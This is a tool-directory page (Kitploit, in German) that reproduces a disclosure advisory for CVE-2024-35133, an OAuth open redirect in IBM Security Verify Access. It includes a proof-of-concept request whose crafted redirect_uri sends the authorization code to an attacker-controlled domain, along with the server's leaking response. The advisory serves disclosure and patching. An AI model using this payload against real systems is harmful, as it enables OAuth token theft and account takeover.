Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
IBM-Security-Verify-oAuth_Token_Steal-CVE-2024-35133 — Sicherheitsbulletin für CVE-2024-35133 - Mit PoC | Kitploit
Tools/GitHubGitHub/ozozuz/ibm-security-verify-oauth_token_steal-cve-2024-35133
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubozozuz/ibm-security-verify-oauth_token_steal-cve-2024-35133

IBM-Security-Verify-oAuth_Token_Steal-CVE-2024-35133

Sicherheitsbulletin für CVE-2024-35133 - Mit PoC

Repository anzeigen
23vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

IBM Security Verify Access – Offene Weiterleitung während des OAuth-Ablaufs (CVE-2024-35133)

Inhaltsverzeichnis

  1. Übersicht
  2. Detaillierte Beschreibung
  3. Proof of Concept
  4. Lösung
  5. Offenlegungszeitplan
  6. Referenzen
  7. Danksagungen
  8. Rechtliche Hinweise

Übersicht

Revision: 1.0
Auswirkungen:
Indem ein Angreifer ein Opfer dazu verleitet, eine speziell gestaltete Website zu besuchen, könnte er diese Schwachstelle ausnutzen, um die angezeigte URL zu fälschen und den Benutzer auf eine bösartige Website umzuleiten. Dadurch könnte der Angreifer hochsensible Informationen erlangen oder weitere Angriffe gegen das Opfer durchführen.

Schweregrad:

  • NIST: Hoch
  • IBM: Mittel

CVSS-Wert:

  • NIST: 8.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
  • IBM: 6.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N)

CVE-ID: CVE-2024-35133

Anbieter: IBM

Betroffene Produkte:

  • IBM Security Verify Access
  • IBM Security Verify Access Docker

Betroffene Versionen: 10.0.0 – 10.0.8

Produktbeschreibung

IBM Security Verify Access ist eine vollständige Lösung für Autorisierung und Netzwerksicherheitsrichtlinienverwaltung. Es bietet End-to-End-Schutz von Ressourcen über geografisch verteilte Intranets und Extranets.

Zu den wichtigsten Funktionen gehören:

  • Authentifizierung: Große Auswahl an integrierten Authentifizierungsmethoden und Unterstützung für externe Authentifizierungsmethoden.
  • Autorisierung: Sichere Erlaubnis- und Verweigerungsentscheidungen für Anfragen auf geschützte Ressourcen.
  • Datensicherheit und zentrale Ressourcenverwaltung: Verwaltet sicheren Zugriff auf interne, netzwerkbasierte Ressourcen über öffentliche Internetverbindungen durch ein unternehmenseigenes Firewall-System.

Detaillierte Beschreibung

Bei einem Penetrationstest des OAuth-Ablaufs für einen Kunden wurde eine Schwachstelle mit offener Weiterleitung (Open Redirect) entdeckt, die das Abfließen der OAuth-Variablen „code“ ermöglicht.

Durch Umgehung der Parser-Logik, die für die Überprüfung des Parameters „redirect_uri“ während eines OAuth-Ablaufs verantwortlich ist (unter Ausnutzung von RFC 3986), konnte der Angreifer den Domain-Whitelist-Filter in IBM Security Verify Access manipulieren. Dies führte zu einer offenen Weiterleitung auf eine beliebige, vom Angreifer kontrollierte Domain. Das Opfer konnte auf eine bösartige Website umgeleitet werden, während die Domain vertrauenswürdig erschien.

Dies könnte zur Offenlegung sensibler Informationen wie des OAuth-Tokens „code“ oder zu weiteren Angriffen gegen das Opfer führen.


Proof of Concept

Anfrage

GET /oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+ HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

Antwort

HTTP/1.1 302 Found 
content-language: en-US 
date: Tue, 19 Mar 2024 16:04:35 GMT 
location: https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED] 
p3p: CP="NON CUR OTPi OUR NOR UNI" 
x-frame-options: DENY 
x-content-type-options: nosniff 
cache-control: no-store 
x-xss-protection: 1; mode=block 
x-permitted-cross-domain-policies: none 
cross-origin-resource-policy: same-site 
content-security-policy: frame-ancestors 'none' 
referrer-policy: no-referrer-when-downgrade 
strict-transport-security: max-age=31536000; includeSubDomains 
pragma: no-cache 
Content-Length: 0.

Lösung

Informationen zu Patch, Upgrade oder empfohlenen Workarounds finden Sie im IBM Security Bulletin 7166712.
Weitere Details finden Sie unter Referenzen.


Offenlegungszeitplan

  • 19.03.2024: Schwachstelle vom Sicherheitsforscher (Giulio Garzia) entdeckt
  • 21.03.2024: Schwachstelle an den Kunden weitergegeben, der IBM Security Verify Access einsetzt
  • 02.04.2024: Schwachstelle an IBM gemeldet
  • 14.05.2024: Schwachstelle von IBM bestätigt
  • 18.07.2024: Vorab-Patch von IBM an den Kunden bereitgestellt
  • 27.08.2024: Sicherheitsbulletin und Schwachstelle von IBM veröffentlicht

Referenzen

  1. IBM Security Bulletin CVE-2024-35133
  2. IBM X-Force Vulnerability Database
  3. NIST CVE-2024-35133
  4. CWE-178: Unsachgemäße Behandlung von URLs

Danksagungen

Diese Schwachstelle wurde entdeckt und gemeldet von:

  • Giulio Garzia
    LinkedIn
    GitHub

Rechtliche Hinweise

Copyright (c) 2024 Giulio Garzia „Ozozuz“

Die elektronische Weiterverbreitung dieses Hinweises ist gestattet. Er darf nur mit ausdrücklicher schriftlicher Zustimmung bearbeitet werden. Für die Genehmigung, diesen Hinweis in anderen Medien abzudrucken, kontaktieren Sie den Autor.

Haftungsausschluss: Die Informationen in dieser Warnmeldung sind zum Zeitpunkt der Veröffentlichung auf der Grundlage der verfügbaren Daten korrekt. Es werden keine Gewährleistungen übernommen. Weder der Autor noch der Herausgeber haften für direkte, indirekte oder Folgeschäden, die aus der Verwendung dieser Informationen entstehen.

Tool herunterladen